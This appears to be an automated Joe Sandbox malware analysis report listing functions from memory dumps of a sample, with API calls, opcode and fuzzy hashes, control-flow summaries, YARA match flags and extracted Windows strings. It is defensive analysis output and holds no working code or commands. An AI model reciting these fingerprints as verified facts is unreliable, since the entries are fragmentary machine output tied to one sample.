                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                                                                  • Opcode ID: 29ccce100494c67d4f1b09088285493934354a39b66b0afe61a6abcbbcb7c63c
                                                                                                                                                                                                                                  • Instruction ID: ab54a8886db9e3a83fd3f079c0634e3db54f3b12062865509fe12da72bd61821
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29ccce100494c67d4f1b09088285493934354a39b66b0afe61a6abcbbcb7c63c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 06E086762402147BD610FA5ADC41F9BB75DDFC5714F004429FA48A7141C6717911C7F4
                                                                                                                                                                                                                                  Function 014E34E0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 8c2b9c286c84778407f9bcc1979cc912adc340fdfcc57f345d09bf6fe1467ba0
                                                                                                                                                                                                                                  • Instruction ID: fb317ee1d158248e1803712a52f4c333bd897492a0aa08aed369102fc4550407
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c2b9c286c84778407f9bcc1979cc912adc340fdfcc57f345d09bf6fe1467ba0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B90023160510502D90061585614706100597D0211F61C81AA1414D79DC7B5895175A2
                                                                                                                                                                                                                                  Function 014E2BC0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: e56a7b7498e03c93616289443b0019c6edeb8c5fda55ef9bc159a60914e0ba1a
                                                                                                                                                                                                                                  • Instruction ID: b75240a139c6382294a6278f4e95a6537bfb0d212099c75ce61db8f20d993c08
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e56a7b7498e03c93616289443b0019c6edeb8c5fda55ef9bc159a60914e0ba1a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E390023120100502D90065986508646000597E0311F51D41AA6014D66EC77588917131
                                                                                                                                                                                                                                  Function 014E2B90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 84ba0f2c5b787aad02a995044bfdebf13bbcf1dad52a5d9d616596398e0a4841
                                                                                                                                                                                                                                  • Instruction ID: 6073251154c5688308f92b97807d57c94eabd6e713d0b8c21d5236395ef431dd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84ba0f2c5b787aad02a995044bfdebf13bbcf1dad52a5d9d616596398e0a4841
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1690023120108902D9106158950474A000597D0311F55C81AA5414E69DC7B588917121
                                                                                                                                                                                                                                  Function 014E2A80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 152 14e2a80-14e2a8c LdrInitializeThunk
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 953ade2136c5cfee21f04c63e37845bd385df178834c718c97f964debf193de9
                                                                                                                                                                                                                                  • Instruction ID: 480b8ab90d5940372870ff1c4bb9e2e9b34809276adee7e43fcb066a911072bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 953ade2136c5cfee21f04c63e37845bd385df178834c718c97f964debf193de9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0090026120200103490571585514616400A97E0211F51C42AE2004DA1DC63588917125
                                                                                                                                                                                                                                  Function 014E2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: 3d93c64c872066508d064a6dc8fa1a37af74f3b687a2fe3189dd7b15254b5be5
                                                                                                                                                                                                                                  • Instruction ID: d0c4162ff77afb44a85fedd8ca4eea9a55def56cf8365e275966b9c348c71d97
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3d93c64c872066508d064a6dc8fa1a37af74f3b687a2fe3189dd7b15254b5be5
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4C90023120100513D91161585604707000997D0251F91C81BA1414D69DD7768952B121
                                                                                                                                                                                                                                  Function 014E2EB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: e8f8e01147a56fd71fbdcdd988d09781e9b34ea2a09a57d0ec8d2fc85758a4c9
                                                                                                                                                                                                                                  • Instruction ID: 4473ed2812b130c6b9c94c04709423a3662545a8a91c0d5804959bfdf0efce4b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8f8e01147a56fd71fbdcdd988d09781e9b34ea2a09a57d0ec8d2fc85758a4c9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B90023120140502D9006158591470B000597D0312F51C41AA2154D66DC73588517571
                                                                                                                                                                                                                                  Function 004140A2 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 75threadwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0041416D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                  • String ID: -69O$-q<$G8uE$G8uE-69OL$G8uE-69OL
                                                                                                                                                                                                                                  • API String ID: 1836367815-1308402997
                                                                                                                                                                                                                                  • Opcode ID: 4a7549dc291047607dc34c6eec3bb7cc46a4129a54e39d764c9277ff9e5f347a
                                                                                                                                                                                                                                  • Instruction ID: 376b1731d0f3bba1e6e74f86399266947dd6ae6205731cb07838efac425f82cb
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4a7549dc291047607dc34c6eec3bb7cc46a4129a54e39d764c9277ff9e5f347a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0C118972E4102435D711AE55DC01FDFBFA8DB80B20F05412AF700AB141D77CA64287A8
                                                                                                                                                                                                                                  Function 004140B8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 74threadwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 18 4140b8-4140c0 19 414100-414141 call 42e853 call 42f263 call 417823 call 404843 call 424ec3 18->19 20 4140c2-4140e3 18->20 23 414144-41415e 19->23 22 4140e5 20->22 20->23 25 4140e6 22->25 26 414180-414185 23->26 27 414160-414171 PostThreadMessageW 23->27 25->25 29 4140e8-4140f1 25->29 27->26 30 414173-41417d 27->30 29->19 30->26
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0041416D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                  • String ID: -69O$G8uE$G8uE-69OL$G8uE-69OL
                                                                                                                                                                                                                                  • API String ID: 1836367815-2690296174
                                                                                                                                                                                                                                  • Opcode ID: 6b839f6249b27768497eb7eb58a37aca188b8480f76df8be92d11f4c1489660f
                                                                                                                                                                                                                                  • Instruction ID: cc1790c02d786663a4433e2c8f495a403b356d7deedf6d12b4446235fbcd5af2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6b839f6249b27768497eb7eb58a37aca188b8480f76df8be92d11f4c1489660f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28117F72E452087ADB209AA4EC42FEF7B789F80714F01815AFA14BB241C77D594687E9
                                                                                                                                                                                                                                  Function 004140F3 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 57threadwindowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000), ref: 0041416D
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessagePostThread
                                                                                                                                                                                                                                  • String ID: -69O$G8uE$G8uE-69OL$G8uE-69OL
                                                                                                                                                                                                                                  • API String ID: 1836367815-2690296174
                                                                                                                                                                                                                                  • Opcode ID: a80d168c6a128c902df28832f9bb460c61be71fb933f6642e8c82d39a2b65a9f
                                                                                                                                                                                                                                  • Instruction ID: 430fca5e306dda3203284aeb1e46c3d4f24b5f9102c314fafe372dba7b91ba21
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a80d168c6a128c902df28832f9bb460c61be71fb933f6642e8c82d39a2b65a9f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F401D671E4121876EB21AAD19C06FDF7B7C9F80B14F018069FA107B281D6BC6A0687E9
                                                                                                                                                                                                                                  Function 0042CAA3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 79 42caa3-42cae4 call 4048d3 call 42d983 RtlFreeHeap
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4), ref: 0042CADF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FreeHeap
                                                                                                                                                                                                                                  • String ID: keA
                                                                                                                                                                                                                                  • API String ID: 3298025750-2727482167
                                                                                                                                                                                                                                  • Opcode ID: 681bd1f20ea3189675e17e877edd0f8c4eeb3f41bfc2e57b4ac409f35e7157c1
                                                                                                                                                                                                                                  • Instruction ID: e834b4b46261a5b62c8c7761e0b4186ee00804b3b51d1bb597083c27661f655a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 681bd1f20ea3189675e17e877edd0f8c4eeb3f41bfc2e57b4ac409f35e7157c1
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2FE06DB26002047BD614EF59DC41E9B73ADEFC8710F004419F948A7241C670B9118BB8
                                                                                                                                                                                                                                  Function 0042CA53 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 133 42ca53-42ca94 call 4048d3 call 42d983 RtlAllocateHeap
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(?,0041E57B,?,?,00000000,?,0041E57B,?,?,?), ref: 0042CA8F
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                                                                                                                  • Opcode ID: 8a700a8c3a0a144c91516dd14f57180c07477dd7731598e4d6a2530fd7bb92eb
                                                                                                                                                                                                                                  • Instruction ID: a22f2ec269460c622849d002825711464a6409f01001f71476e2b7095da17035
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a700a8c3a0a144c91516dd14f57180c07477dd7731598e4d6a2530fd7bb92eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D8E06DB26042047BC710EE59EC42F9B77ADEFC4714F004419F908A7241C670B9108BB9
                                                                                                                                                                                                                                  Function 0042CAF3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 143 42caf3-42cb2c call 4048d3 call 42d983 ExitProcess
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,00000000,00000000,?,298863EF,?,?,298863EF), ref: 0042CB27
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179229670326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                  • Opcode ID: dea030b86dc1f118d82cbf4bf509753bfed93b4a73e356208daf87d09624a864
                                                                                                                                                                                                                                  • Instruction ID: 22873bfc0b9772659a6fadeb203f8fc64cab6d9e76b8b20e473718e1edfaeb86
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dea030b86dc1f118d82cbf4bf509753bfed93b4a73e356208daf87d09624a864
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8FE086762006147BC610FA5ADC05F9B7B5DDFC5714F004429FA48E7141C775B91087F5
                                                                                                                                                                                                                                  Function 014E2B2A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 148 14e2b2a-14e2b2f 149 14e2b3f-14e2b46 LdrInitializeThunk 148->149 150 14e2b31-14e2b38 148->150
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                                                                                                                  • Opcode ID: c210db6f6d65d8523ea97fcb732e1e873bff6f3f42d2117df4535b6fbe9f0ea3
                                                                                                                                                                                                                                  • Instruction ID: 07a6f872c5cd45dcc53c7ad3789574c4be470fcf78d316b71a943e46da0c9d45
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c210db6f6d65d8523ea97fcb732e1e873bff6f3f42d2117df4535b6fbe9f0ea3
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3AB09B719014C5C9DE11EB64570CB17794477D0711F15C457D2460A52F8778C091F175

                                                                                                                                                                                                                                  Non-executed Functions

                                                                                                                                                                                                                                  Function 014D8540 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • corrupted critical section, xrefs: 015152CD
                                                                                                                                                                                                                                  • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015152D9
                                                                                                                                                                                                                                  • 8, xrefs: 015150EE
                                                                                                                                                                                                                                  • Critical section address, xrefs: 01515230, 015152C7, 0151533F
                                                                                                                                                                                                                                  • Thread is in a state in which it cannot own a critical section, xrefs: 0151534E
                                                                                                                                                                                                                                  • undeleted critical section in freed memory, xrefs: 01515236
                                                                                                                                                                                                                                  • Address of the debug info found in the active list., xrefs: 015152B9, 01515305
                                                                                                                                                                                                                                  • Critical section address., xrefs: 0151530D
                                                                                                                                                                                                                                  • Critical section debug info address, xrefs: 0151522A, 01515339
                                                                                                                                                                                                                                  • Thread identifier, xrefs: 01515345
                                                                                                                                                                                                                                  • double initialized or corrupted critical section, xrefs: 01515313
                                                                                                                                                                                                                                  • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01515215, 015152A1, 01515324
                                                                                                                                                                                                                                  • Invalid debug info address of this critical section, xrefs: 015152C1
                                                                                                                                                                                                                                  • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 015152ED
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                                  • API String ID: 0-2368682639
                                                                                                                                                                                                                                  • Opcode ID: dd253dfca6ffc8b725ddf550c3280386a112673bee4286384f95aea06d102a3a
                                                                                                                                                                                                                                  • Instruction ID: eac2d4a9ea54c2a104b464adc54b07a233ca343992148eeef65edfbd4c732276
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dd253dfca6ffc8b725ddf550c3280386a112673bee4286384f95aea06d102a3a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA81AF71A4135AAFEB21DF99C840FAEBBF5FB49B14F60401AF905BB250D3B1A944CB50
                                                                                                                                                                                                                                  Function 0149D2EC Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                                                                                                                                                                                                                  • API String ID: 0-3532704233
                                                                                                                                                                                                                                  • Opcode ID: 84ebe768510d07981b13cfc821eee4265c561c58338ebe0ee11c1ccc98f7b6ec
                                                                                                                                                                                                                                  • Instruction ID: 042b0bacb7dff6ad182406180d44a2ed1f3e81565efe8139cfd93a2aa41a0a27
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84ebe768510d07981b13cfc821eee4265c561c58338ebe0ee11c1ccc98f7b6ec
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 12B17D729083429FDB21DF68C440A6FBBE8AF94754F05492FFA89D7320D770D9498B92
                                                                                                                                                                                                                                  Function 0149D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0149D06F
                                                                                                                                                                                                                                  • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0149D202
                                                                                                                                                                                                                                  • @, xrefs: 0149D24F
                                                                                                                                                                                                                                  • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0149D0E6
                                                                                                                                                                                                                                  • @, xrefs: 0149D09D
                                                                                                                                                                                                                                  • @, xrefs: 0149D2B3
                                                                                                                                                                                                                                  • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0149D263
                                                                                                                                                                                                                                  • Control Panel\Desktop\LanguageConfiguration, xrefs: 0149D136
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                                                                                                                                  • API String ID: 0-1356375266
                                                                                                                                                                                                                                  • Opcode ID: 4bc88c4ce707d42b51395a6a632a1ff5b4857ae2ad223ea1022ad6738399759c
                                                                                                                                                                                                                                  • Instruction ID: 79ca14d580011e93253adc190801275aa791dd9a74788a9730f0277bfa0a9ed8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4bc88c4ce707d42b51395a6a632a1ff5b4857ae2ad223ea1022ad6738399759c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2EA18DB29083069FDB21DF65C444BABBBE8BB94715F10492FF68897260D774D908CB93
                                                                                                                                                                                                                                  Function 0154F51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000002.00000002.179231505422.0000000001470000.00000040.00001000.00020000.00000000.sdmp, Offset: 01470000, based on PE: true
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1470000_Pp7OXMFwqhXKx5Y.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                                                                                                                                  • API String ID: 0-2224505338
                                                                                                                                                                                                                                  • Opcode ID: c8652a9b74d9bec289e7b5d043aafa365e1b94b49d7930f9c78abe0516d5161b
